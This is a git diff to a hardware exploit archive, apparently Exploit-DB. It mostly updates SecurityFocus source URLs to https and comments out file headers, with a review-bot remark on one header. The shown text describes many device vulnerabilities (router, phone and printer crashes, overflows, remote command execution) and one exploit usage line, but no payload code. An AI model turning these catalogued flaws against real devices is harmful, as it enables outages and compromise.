https://www.securityfocus.com/bid/9779/info The Motorola T720 has been reported prone to a remote denial of service vulnerability. The issue presents itself when the phone handles excessive IP based traffic under certain circumstances. 
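Review bot: In exploits/hardware/dos/23778.c the added `// source:` comments out line 1 only. The unchanged context line that follows ("The Motorola T720 has been reported prone to a remote denial of service vulnerability. ...") is still bare prose, so as far as this hunk shows the header is only partly commented and a compiler would still stop on it. 20331.c and 22440.c in this same patch keep the source line and the description together inside one `/* ... */` block. Doing the same here, and in the other .c files that received `// source:`, would make the header consistent and fully commented.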
diff --git a/exploits/hardware/dos/23786.c b/exploits/hardware/dos/23786.c index c1ff273b6..768e97d57 100644 --- a/exploits/hardware/dos/23786.c +++ b/exploits/hardware/dos/23786.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9787/info +// source: https://www.securityfocus.com/bid/9787/info Nortel Wireless LAN Access Point 2200 series appliances have been reported to be prone to a remote denial of service vulnerability. The issue is reported to present itself when a large network request is handled by one of the Wireless LAN Access Point default administration services. This will reportedly cause the Access Point Appliance Operating service to crash, effectively denying service to legitimate users. diff --git a/exploits/hardware/dos/23788.pl b/exploits/hardware/dos/23788.pl index be3c96f69..07f23df91 100755 --- a/exploits/hardware/dos/23788.pl +++ b/exploits/hardware/dos/23788.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9795/info +source: https://www.securityfocus.com/bid/9795/info An issue in the handling of specific web requests by SureCom network devices has been identified. By placing a malformed request to the web configuration interface, it is possible for an attacker to deny service to legitimate users of a vulnerable device. diff --git a/exploits/hardware/dos/23789.c b/exploits/hardware/dos/23789.c index f329b919c..de7544b05 100644 --- a/exploits/hardware/dos/23789.c +++ b/exploits/hardware/dos/23789.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9795/info +// source: https://www.securityfocus.com/bid/9795/info An issue in the handling of specific web requests by SureCom network devices has been identified. By placing a malformed request to the web configuration interface, it is possible for an attacker to deny service to legitimate users of a vulnerable device. diff --git a/exploits/hardware/dos/23876.txt b/exploits/hardware/dos/23876.txt index 94e9f81fa..3adfa2922 100644 --- a/exploits/hardware/dos/23876.txt 
+++ b/exploits/hardware/dos/23876.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9969/info +source: https://www.securityfocus.com/bid/9969/info It has been reported that Picophone is prone to a remote buffer overflow vulnerability. This issue is due to the application failing to verify the size of user input before storing it in a finite buffer. diff --git a/exploits/hardware/dos/23900.txt b/exploits/hardware/dos/23900.txt index d042f8fd0..669d067f7 100644 --- a/exploits/hardware/dos/23900.txt +++ b/exploits/hardware/dos/23900.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10021/info +source: https://www.securityfocus.com/bid/10021/info It has been reported that cdp may be prone to a buffer overflow vulnerability that may allow an attacker to cause a denial of service condition in the software. The issue exists due to insufficient boundary checks performed by the printTOC() function. The buffer overflow condition may occur if when a song with a track name exceeding 200 bytes is accessed via the application. diff --git a/exploits/hardware/dos/24143.c b/exploits/hardware/dos/24143.c index 924903603..ce70ae414 100644 --- a/exploits/hardware/dos/24143.c +++ b/exploits/hardware/dos/24143.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10411/info +// source: https://www.securityfocus.com/bid/10411/info It has been reported that the VocalTec VGW120 and VGW480 Telephony Gateways are prone to a remote denial of service vulnerability. The issue is reported to exist in the ASN.1/H.323/H.225 stack. diff --git a/exploits/hardware/dos/24344.txt b/exploits/hardware/dos/24344.txt index faf6777d1..8428dc725 100644 --- a/exploits/hardware/dos/24344.txt +++ b/exploits/hardware/dos/24344.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10840/info +source: https://www.securityfocus.com/bid/10840/info The USR808054 wireless access point is reported to contain a denial of service vulnerability in its embedded web server. 
diff --git a/exploits/hardware/dos/24839.c b/exploits/hardware/dos/24839.c index dc1e69bee..8be148132 100644 --- a/exploits/hardware/dos/24839.c +++ b/exploits/hardware/dos/24839.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11932/info +// source: https://www.securityfocus.com/bid/11932/info It is reported that Ricoh 450/455 printers are susceptible to a remote denial of service vulnerability. This issue is due to a failure of the device to properly handle exceptional ICMP packets. diff --git a/exploits/hardware/dos/25082.txt b/exploits/hardware/dos/25082.txt index 64fb08648..46a3d3216 100644 --- a/exploits/hardware/dos/25082.txt +++ b/exploits/hardware/dos/25082.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12443/info +source: https://www.securityfocus.com/bid/12443/info Linksys PSUS4 PrintServer is reported prone to a remote denial of service vulnerability while handling certain HTTP POST requests received on TCP port 80. diff --git a/exploits/hardware/dos/25107.txt b/exploits/hardware/dos/25107.txt index 1c05b5af1..30e318687 100644 --- a/exploits/hardware/dos/25107.txt +++ b/exploits/hardware/dos/25107.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12571/info +source: https://www.securityfocus.com/bid/12571/info VPN-1 SecureClient is reported prone to a vulnerability that may allow local attackers to disclose sensitive memory. This can lead to various other attacks against a vulnerable computer. The vulnerability exists in the 'SR_Service.exe', which manages VPN connections. diff --git a/exploits/hardware/dos/25124.txt b/exploits/hardware/dos/25124.txt index 1e6eae3bc..f04b791b4 100644 --- a/exploits/hardware/dos/25124.txt +++ b/exploits/hardware/dos/25124.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12595/info +source: https://www.securityfocus.com/bid/12595/info Thomson TCW690 cable modem is reported prone to multiple remote vulnerabilities. These issues may allow an attacker to cause a denial of service condition and/or gain unauthorized access to the device. diff --git a/exploits/hardware/dos/25277.txt b/exploits/hardware/dos/25277.txt index 3fff40348..ae5bf81b1 100644 --- a/exploits/hardware/dos/25277.txt +++ b/exploits/hardware/dos/25277.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12901/info +source: https://www.securityfocus.com/bid/12901/info Netcomm NB1300 Modem/Router is reported prone to a remote denial of service vulnerability. diff --git a/exploits/hardware/dos/25402.txt b/exploits/hardware/dos/25402.txt index 624189a29..d8dcad7fc 100644 --- a/exploits/hardware/dos/25402.txt +++ b/exploits/hardware/dos/25402.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13154/info +source: https://www.securityfocus.com/bid/13154/info A remote denial of service vulnerability is reported to affect the LG U8120 Mobile Phone. The report indicates that the issue manifests when an affected phone processes a malicious MIDI file. diff --git a/exploits/hardware/dos/25711.txt b/exploits/hardware/dos/25711.txt index d0ada4b6b..be570464c 100644 --- a/exploits/hardware/dos/25711.txt +++ b/exploits/hardware/dos/25711.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13782/info +source: https://www.securityfocus.com/bid/13782/info Sony Ericsson P900 handset is affected by a remote denial of service vulnerability. This issue arises because the application fails to perform boundary checks prior to copying user-supplied data into a finite sized buffer. diff --git a/exploits/hardware/dos/25736.txt b/exploits/hardware/dos/25736.txt index 1449bbf38..8f7018b88 100644 --- a/exploits/hardware/dos/25736.txt +++ b/exploits/hardware/dos/25736.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13784/info +source: https://www.securityfocus.com/bid/13784/info Nokia 9500 handset vCard viewer is affected by a remote denial of service vulnerability. diff --git a/exploits/hardware/dos/25967.txt b/exploits/hardware/dos/25967.txt index a02241d8f..6bcde3a74 100644 --- a/exploits/hardware/dos/25967.txt +++ b/exploits/hardware/dos/25967.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14251/info +source: https://www.securityfocus.com/bid/14251/info The CallManager CTI Manager service is susceptible to a remote denial of service vulnerability. diff --git a/exploits/hardware/dos/26233.txt b/exploits/hardware/dos/26233.txt index 9d1887421..4094e0ba3 100644 --- a/exploits/hardware/dos/26233.txt +++ b/exploits/hardware/dos/26233.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14770/info +source: https://www.securityfocus.com/bid/14770/info Cisco IOS Firewall Authentication Proxy is prone to a buffer overflow condition. Successful exploitation of this issue could cause a denial of service or potential execution of arbitrary code. diff --git a/exploits/hardware/dos/26548.pl b/exploits/hardware/dos/26548.pl index b3ad44e58..085c0b95d 100755 --- a/exploits/hardware/dos/26548.pl +++ b/exploits/hardware/dos/26548.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15525/info +source: https://www.securityfocus.com/bid/15525/info Cisco PIX is susceptible to a remote denial-of-service vulnerability when handling certain TCP SYN packets. diff --git a/exploits/hardware/dos/26754.txt b/exploits/hardware/dos/26754.txt index 3be1beeb4..a6a26a89a 100644 --- a/exploits/hardware/dos/26754.txt +++ b/exploits/hardware/dos/26754.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15757/info +source: https://www.securityfocus.com/bid/15757/info VPN-1 SecureClient is reported prone to a policy bypass vulnerability. This issue is due to a failure of the application to securely implement remote administrator-provided policies on affected computers. diff --git a/exploits/hardware/dos/26825.txt b/exploits/hardware/dos/26825.txt index 18a557ee3..551b32a82 100644 --- a/exploits/hardware/dos/26825.txt +++ b/exploits/hardware/dos/26825.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15861/info +source: https://www.securityfocus.com/bid/15861/info Multiple Linksys devices are prone to a denial of service vulnerability. diff --git a/exploits/hardware/dos/26833.txt b/exploits/hardware/dos/26833.txt index 59aa029dc..eb90e7e0b 100644 --- a/exploits/hardware/dos/26833.txt +++ b/exploits/hardware/dos/26833.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15864/info +source: https://www.securityfocus.com/bid/15864/info Multiple unspecified Cisco Catalyst switches are prone to a denial of service vulnerability. diff --git a/exploits/hardware/dos/26834.txt b/exploits/hardware/dos/26834.txt index 183b3380d..d0ed0aa37 100644 --- a/exploits/hardware/dos/26834.txt +++ b/exploits/hardware/dos/26834.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15869/info +source: https://www.securityfocus.com/bid/15869/info Westell Versalink 327W is prone to a denial of service vulnerability. diff --git a/exploits/hardware/dos/27232.txt b/exploits/hardware/dos/27232.txt index 145a5c18f..83d938b27 100644 --- a/exploits/hardware/dos/27232.txt +++ b/exploits/hardware/dos/27232.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16666/info +source: https://www.securityfocus.com/bid/16666/info Nokia N70 is reportedly prone to a remote denial-of-service vulnerability. diff --git a/exploits/hardware/dos/27241.c b/exploits/hardware/dos/27241.c index 8bdf396fa..2e8212d9c 100644 
--- a/exploits/hardware/dos/27241.c +++ b/exploits/hardware/dos/27241.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16690/info +// source: https://www.securityfocus.com/bid/16690/info D-Link DWL-G700AP HTTPD is prone to a remote denial-of-service vulnerability. This issue is due to a failure in the 'httpd' service to properly handle malformed data. diff --git a/exploits/hardware/dos/28228.txt b/exploits/hardware/dos/28228.txt index b8f921dd3..0e64b3a5b 100644 --- a/exploits/hardware/dos/28228.txt +++ b/exploits/hardware/dos/28228.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18996/info +source: https://www.securityfocus.com/bid/18996/info Sunbelt Kerio Personal Firewall is prone to a denial-of-service vulnerability. This issue can occur when a program calls the 'CreateRemoteThread' Windows API call. diff --git a/exploits/hardware/dos/28230.txt b/exploits/hardware/dos/28230.txt index af4b6925c..9acaa6b17 100644 --- a/exploits/hardware/dos/28230.txt +++ b/exploits/hardware/dos/28230.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19006/info +source: https://www.securityfocus.com/bid/19006/info D-Link wired and wireless routers are prone to a buffer-overflow vulnerability because these devices fail to properly bounds-check user-supplied input before copying it to an insufficiently sized memory buffer. diff --git a/exploits/hardware/dos/28739.pl b/exploits/hardware/dos/28739.pl index 6bb96a723..7614c3556 100755 --- a/exploits/hardware/dos/28739.pl +++ b/exploits/hardware/dos/28739.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20309/info +source: https://www.securityfocus.com/bid/20309/info Motorola SB4200 is prone to a remote denial-of-service vulnerability. diff --git a/exploits/hardware/dos/29297.py b/exploits/hardware/dos/29297.py index fc6fe522e..0db699094 100755 --- a/exploits/hardware/dos/29297.py +++ b/exploits/hardware/dos/29297.py 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21666/info +source: https://www.securityfocus.com/bid/21666/info -HP Printers running FTP Print Server are prone to a buffer-overflow vulnerability. This issue occurs because the application fails to boundscheck user-supplied data before copying it into an insufficiently sized buffer. diff --git a/exploits/hardware/dos/29402.txt b/exploits/hardware/dos/29402.txt index 60deb11a9..6ccb32d40 100644 --- a/exploits/hardware/dos/29402.txt +++ b/exploits/hardware/dos/29402.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21933/info +source: https://www.securityfocus.com/bid/21933/info Packeteer PacketShaper is prone to multiple denial-of-service vulnerabilities. diff --git a/exploits/hardware/dos/29767.txt b/exploits/hardware/dos/29767.txt index b941c6baa..3bf37633c 100644 --- a/exploits/hardware/dos/29767.txt +++ b/exploits/hardware/dos/29767.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23061/info +source: https://www.securityfocus.com/bid/23061/info Zyxel Routers running the ZynOS operating system are prone to a remote denial-of-service vulnerability. diff --git a/exploits/hardware/dos/30167.txt b/exploits/hardware/dos/30167.txt index ce62588a9..46b439bec 100644 --- a/exploits/hardware/dos/30167.txt +++ b/exploits/hardware/dos/30167.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24388/info +source: https://www.securityfocus.com/bid/24388/info Packeteer PacketShaper is prone to a remote denial-of-service vulnerability because the application's web interface fails to properly handle unexpected requests. diff --git a/exploits/hardware/dos/30506.txt b/exploits/hardware/dos/30506.txt index 2431ef87b..123c85f68 100644 --- a/exploits/hardware/dos/30506.txt +++ b/exploits/hardware/dos/30506.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25352/info +source: https://www.securityfocus.com/bid/25352/info Cisco IOS is prone to a remote denial-of-service vulnerability because the software fails to properly handle certain CLI commands. diff --git a/exploits/hardware/dos/30517.pl b/exploits/hardware/dos/30517.pl index 96eee7670..c43802765 100755 --- a/exploits/hardware/dos/30517.pl +++ b/exploits/hardware/dos/30517.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25399/info +source: https://www.securityfocus.com/bid/25399/info Grandstream GXV-3000 phones are prone to a remote denial-of-service vulnerability. diff --git a/exploits/hardware/dos/30530.pl b/exploits/hardware/dos/30530.pl index 7b00570c5..45ea0ef9d 100755 --- a/exploits/hardware/dos/30530.pl +++ b/exploits/hardware/dos/30530.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25446/info +source: https://www.securityfocus.com/bid/25446/info Thomson SpeedTouch 2030 is prone to a denial-of-service vulnerability because the device fails to handle specially crafted SIP INVITE messages. diff --git a/exploits/hardware/dos/30538.pl b/exploits/hardware/dos/30538.pl index f002b6349..150906473 100755 --- a/exploits/hardware/dos/30538.pl +++ b/exploits/hardware/dos/30538.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25464/info +source: https://www.securityfocus.com/bid/25464/info Thomson SpeedTouch 2030 is prone to a denial-of-service vulnerability because the device fails to handle specially crafted SIP INVITE messages. diff --git a/exploits/hardware/dos/30679.pl b/exploits/hardware/dos/30679.pl index f1721ffe8..c1f35c7c3 100755 --- a/exploits/hardware/dos/30679.pl +++ b/exploits/hardware/dos/30679.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26120/info +source: https://www.securityfocus.com/bid/26120/info Multiple Nortel Networks UNIStim VoIP telephony products are prone to a remote vulnerability that may allow eavesdropping. 
diff --git a/exploits/hardware/dos/31102.c b/exploits/hardware/dos/31102.c index 33b270ea6..998a8e109 100644 --- a/exploits/hardware/dos/31102.c +++ b/exploits/hardware/dos/31102.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27599/info +// source: https://www.securityfocus.com/bid/27599/info MikroTik RouterOS is prone to a denial-of-service vulnerability. An attacker can exploit this issue to crash an affected router, denying service to legitimate users. diff --git a/exploits/hardware/dos/31306.txt b/exploits/hardware/dos/31306.txt index a22f41a16..89203f54a 100644 --- a/exploits/hardware/dos/31306.txt +++ b/exploits/hardware/dos/31306.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28004/info +source: https://www.securityfocus.com/bid/28004/info Nortel UNIStim IP Phone products are prone to a remote denial-of-service vulnerability because the software fails to properly handle unexpected network datagrams. diff --git a/exploits/hardware/dos/31478.txt b/exploits/hardware/dos/31478.txt index e1482a9b4..115fb6afa 100644 --- a/exploits/hardware/dos/31478.txt +++ b/exploits/hardware/dos/31478.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28414/info +source: https://www.securityfocus.com/bid/28414/info Linksys SPA-2102 Phone Adapter is prone to a denial-of-service vulnerability when handling multiple packets in quick succession. diff --git a/exploits/hardware/dos/31884.txt b/exploits/hardware/dos/31884.txt index b6b788356..44ba5516a 100644 --- a/exploits/hardware/dos/31884.txt +++ b/exploits/hardware/dos/31884.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29570/info +source: https://www.securityfocus.com/bid/29570/info Linksys WRH54G Wireless-G Router is prone to a denial-of-service vulnerability because it fails to adequately handle malformed HTTP requests. As a result, memory becomes corrupted and the device's HTTP service will crash. 
diff --git a/exploits/hardware/dos/32305.txt b/exploits/hardware/dos/32305.txt index 25d00b9b4..c34e67ae0 100644 --- a/exploits/hardware/dos/32305.txt +++ b/exploits/hardware/dos/32305.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30919/info +source: https://www.securityfocus.com/bid/30919/info Dreambox is prone to a remote denial-of-service vulnerability. diff --git a/exploits/hardware/dos/32341.html b/exploits/hardware/dos/32341.html index e1d6f7f3d..f547e1b60 100644 --- a/exploits/hardware/dos/32341.html +++ b/exploits/hardware/dos/32341.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/31061/info +source: https://www.securityfocus.com/bid/31061/info Apple iPhone and iPod touch are prone to a remote denial-of-service vulnerability that occurs in the WebKit library used by the Safari browser. diff --git a/exploits/hardware/dos/32472.txt b/exploits/hardware/dos/32472.txt index 77303c7f2..283dc8056 100644 --- a/exploits/hardware/dos/32472.txt +++ b/exploits/hardware/dos/32472.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/31703/info +source: https://www.securityfocus.com/bid/31703/info Nokia Web Browser for S60 is prone to a denial-of-service vulnerability when handling malicious HTML files. diff --git a/exploits/hardware/dos/32583.txt b/exploits/hardware/dos/32583.txt index 11b0f7d6f..f83d9e6b7 100644 --- a/exploits/hardware/dos/32583.txt +++ b/exploits/hardware/dos/32583.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/32290/info +source: https://www.securityfocus.com/bid/32290/info NETGEAR WGR614 is prone to a denial-of-service vulnerability that occurs in the administration web interface. diff --git a/exploits/hardware/dos/32692.txt b/exploits/hardware/dos/32692.txt index 46b322e04..edfad5276 100644 --- a/exploits/hardware/dos/32692.txt +++ b/exploits/hardware/dos/32692.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33072/info +source: https://www.securityfocus.com/bid/33072/info Symbian S60 is prone to a denial-of-service vulnerability. diff --git a/exploits/hardware/dos/33216.txt b/exploits/hardware/dos/33216.txt index a50cd9e25..e0e09ce65 100644 --- a/exploits/hardware/dos/33216.txt +++ b/exploits/hardware/dos/33216.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36315/info +source: https://www.securityfocus.com/bid/36315/info Check Point Software Endpoint Security Full Disk Encryption for Microsoft Windows is prone to a remote denial-of-service vulnerability. diff --git a/exploits/hardware/dos/33280.txt b/exploits/hardware/dos/33280.txt index 699629bd3..7a99b772e 100644 --- a/exploits/hardware/dos/33280.txt +++ b/exploits/hardware/dos/33280.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36659/info +source: https://www.securityfocus.com/bid/36659/info Palm WebOS is prone to a remote denial-of-service vulnerability because it fails to properly validate user-supplied data. diff --git a/exploits/hardware/dos/33476.pl b/exploits/hardware/dos/33476.pl index 5cf77cd31..b8e9dd006 100755 --- a/exploits/hardware/dos/33476.pl +++ b/exploits/hardware/dos/33476.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37670/info +source: https://www.securityfocus.com/bid/37670/info JUNOS is prone to a remote denial-of-service vulnerability that arises when the application handles specially crafted TCP packets. diff --git a/exploits/hardware/dos/33583.pl b/exploits/hardware/dos/33583.pl index a569bab59..fa4ac683b 100755 --- a/exploits/hardware/dos/33583.pl +++ b/exploits/hardware/dos/33583.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38010/info +source: https://www.securityfocus.com/bid/38010/info Xerox WorkCentre is prone to a buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data. 
diff --git a/exploits/hardware/dos/34394.pl b/exploits/hardware/dos/34394.pl index ab2f39c21..65215f011 100755 --- a/exploits/hardware/dos/34394.pl +++ b/exploits/hardware/dos/34394.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/42153/info +source: https://www.securityfocus.com/bid/42153/info D-Link WBR-2310 is prone to a remote buffer-overflow vulnerability because it fails to bounds-check user-supplied input before copying it into an insufficiently sized memory buffer. This issue occurs in the device's webserver. diff --git a/exploits/hardware/dos/35939.txt b/exploits/hardware/dos/35939.txt index 0561629ac..043e10964 100644 --- a/exploits/hardware/dos/35939.txt +++ b/exploits/hardware/dos/35939.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/48642/info +source: https://www.securityfocus.com/bid/48642/info The Alice Modem is prone to a cross-site scripting vulnerability and a denial-of-service vulnerability because the device fails to properly handle user-supplied input. diff --git a/exploits/hardware/dos/36868.pl b/exploits/hardware/dos/36868.pl index bb006ca3d..7ca4bab53 100755 --- a/exploits/hardware/dos/36868.pl +++ b/exploits/hardware/dos/36868.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/52106/info +source: https://www.securityfocus.com/bid/52106/info Mercury MR804 router is prone to multiple denial-of-service vulnerabilities. diff --git a/exploits/hardware/dos/38483.txt b/exploits/hardware/dos/38483.txt index 24e414cd2..3e5ca6fbb 100644 --- a/exploits/hardware/dos/38483.txt +++ b/exploits/hardware/dos/38483.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/59325/info +source: https://www.securityfocus.com/bid/59325/info TP-LINK TL-WR741N and TL-WR741ND routers are prone to multiple denial-of-service vulnerabilities when handling specially crafted HTTP requests. diff --git a/exploits/hardware/dos/38493.txt b/exploits/hardware/dos/38493.txt index 3ff8e574f..01b391970 100644 
--- a/exploits/hardware/dos/38493.txt +++ b/exploits/hardware/dos/38493.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/59445/info +source: https://www.securityfocus.com/bid/59445/info The Cisco Linksys WRT310N Router is prone to multiple denial-of-service vulnerabilities when handling specially crafted HTTP requests. diff --git a/exploits/hardware/dos/39315.pl b/exploits/hardware/dos/39315.pl index 7d05dde2c..3b541bd7a 100755 --- a/exploits/hardware/dos/39315.pl +++ b/exploits/hardware/dos/39315.pl @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/69809/info +source: https://www.securityfocus.com/bid/69809/info Multiple Aztech routers are prone to a denial-of-service vulnerability. diff --git a/exploits/hardware/dos/41601.c b/exploits/hardware/dos/41601.c index a09443233..5645d52a5 100644 --- a/exploits/hardware/dos/41601.c +++ b/exploits/hardware/dos/41601.c @@ -1,3 +1,4 @@ +/* #Exploit Title: MikroTik Router Denial Of Service | ARP Table OverFlow #Exploit Author: Hosein Askari (FarazPajohan) #Vendor HomePage: https://mikrotik.com/ @@ -18,6 +19,7 @@ #Exploit Command : # ~~~#exploit.out -T0 -h -p [23,23] ################ +*/ #include #include diff --git a/exploits/hardware/dos/7535.php b/exploits/hardware/dos/7535.php index c52370346..2c042b57d 100644 --- a/exploits/hardware/dos/7535.php +++ b/exploits/hardware/dos/7535.php @@ -18,7 +18,7 @@ * * It has been suggested that this is a stack overflow vulnerability. * http://www.securiteam.com/securitynews/5NP0D15GUE.html -* http://www.securityfocus.com/bid/6301/info +* https://www.securityfocus.com/bid/6301/info * * unable to connect to 192.168.1.1:80 (Connection refused) * diff --git a/exploits/hardware/dos/8125.rb b/exploits/hardware/dos/8125.py similarity index 100% rename from exploits/hardware/dos/8125.rb rename to exploits/hardware/dos/8125.py diff --git a/exploits/hardware/local/20999.c b/exploits/hardware/local/20999.c index 29c02ab10..480c54b11 100644 
--- a/exploits/hardware/local/20999.c +++ b/exploits/hardware/local/20999.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3008/info +// source: https://www.securityfocus.com/bid/3008/info ml85p is a Linux driver for Samsung ML-85G series printers. It may be bundled with distributions of Ghostscript. diff --git a/exploits/hardware/local/21000.sh b/exploits/hardware/local/21000.sh index e47153dea..c0c0732ab 100755 --- a/exploits/hardware/local/21000.sh +++ b/exploits/hardware/local/21000.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3008/info +source: https://www.securityfocus.com/bid/3008/info ml85p is a Linux driver for Samsung ML-85G series printers. It may be bundled with distributions of Ghostscript. diff --git a/exploits/hardware/local/21001.txt b/exploits/hardware/local/21001.txt index f9923c657..1967194a4 100644 --- a/exploits/hardware/local/21001.txt +++ b/exploits/hardware/local/21001.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3008/info +source: https://www.securityfocus.com/bid/3008/info ml85p is a Linux driver for Samsung ML-85G series printers. It may be bundled with distributions of Ghostscript. diff --git a/exploits/hardware/local/34954.txt b/exploits/hardware/local/34954.txt index f42c301a2..713dfbcdb 100644 --- a/exploits/hardware/local/34954.txt +++ b/exploits/hardware/local/34954.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/44672/info +source: https://www.securityfocus.com/bid/44672/info Cisco Unified Communications Manager is prone to a local privilege-escalation vulnerability. diff --git a/exploits/hardware/remote/19444.txt b/exploits/hardware/remote/19444.txt index 095c765d6..2a1354331 100644 --- a/exploits/hardware/remote/19444.txt +++ b/exploits/hardware/remote/19444.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/564/info +source: https://www.securityfocus.com/bid/564/info The Dragon-Fire IDS remote web interface under version 1.0 has an insecure CGI script which allows for users to remotely execute commands as the user nobody. This could lead to a remote compromise of the system running Dragon-Fire. diff --git a/exploits/hardware/remote/19538.txt b/exploits/hardware/remote/19538.txt index 39edf60ef..17424450f 100644 --- a/exploits/hardware/remote/19538.txt +++ b/exploits/hardware/remote/19538.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/695/info +source: https://www.securityfocus.com/bid/695/info Hybrid Network's cable modems are vulnerable to several different types of attack due to a lack of authentication for the remote administration/configuration system. The cable modems use a protocol called HSMP, which uses UDP as its transport layer protocol. This makes it trivial to spoof packets and possible for hackers to compromise cable-modem subscribers anonymously. The possible consequences of this problem being exploited are very serious and range from denial of service attacks to running arbitrary code on the modem. diff --git a/exploits/hardware/remote/19554.c b/exploits/hardware/remote/19554.c index 2828d61c2..6e4a863c1 100644 --- a/exploits/hardware/remote/19554.c +++ b/exploits/hardware/remote/19554.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/714/info +source: https://www.securityfocus.com/bid/714/info Certain versions of Ascends (Lucent) router software listen on port 9 (UDP Discard). Ascend provides configuration tools for MAX and Pipeline routers that locate locally installed routers by broadcasting a specially formatted packet to UDP port 9. An attacker can send a similar but malformed packet to the same port that will cause MAX and Pipeline routers running certain software versions to crash. */ 
diff --git a/exploits/hardware/remote/19555.pl b/exploits/hardware/remote/19555.pl index 1bf82b94d..07e1674d3 100755 --- a/exploits/hardware/remote/19555.pl +++ b/exploits/hardware/remote/19555.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/714/info +source: https://www.securityfocus.com/bid/714/info Certain versions of Ascends (Lucent) router software listen on port 9 (UDP Discard). Ascend provides configuration tools for MAX and Pipeline routers that locate locally installed routers by broadcasting a specially formatted packet to UDP port 9. An attacker can send a similar but malformed packet to the same port that will cause MAX and Pipeline routers running certain software versions to crash. diff --git a/exploits/hardware/remote/19632.txt b/exploits/hardware/remote/19632.txt index 30c9451c4..f05f9a815 100644 --- a/exploits/hardware/remote/19632.txt +++ b/exploits/hardware/remote/19632.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/806/info +source: https://www.securityfocus.com/bid/806/info Certain versions of the Tektronix PhaserLink printer ship with a webserver designed to help facilitate configuration of the device. This service is essentially administrator level access as it can completely modify the system characteristics, restart the machine, asign services etc. diff --git a/exploits/hardware/remote/19882.pl b/exploits/hardware/remote/19882.pl index e2f05bba9..22cb39a31 100755 --- a/exploits/hardware/remote/19882.pl +++ b/exploits/hardware/remote/19882.pl @@ -1,4 +1,4 @@ -#source: http://www.securityfocus.com/bid/1154/info +#source: https://www.securityfocus.com/bid/1154/info # #A denial of service attack exists in versions of Cisco IOS, running on a variety of different router hardware. If the router is configured to have a web server running for configuration and other information a user can cause the router to crash. # 
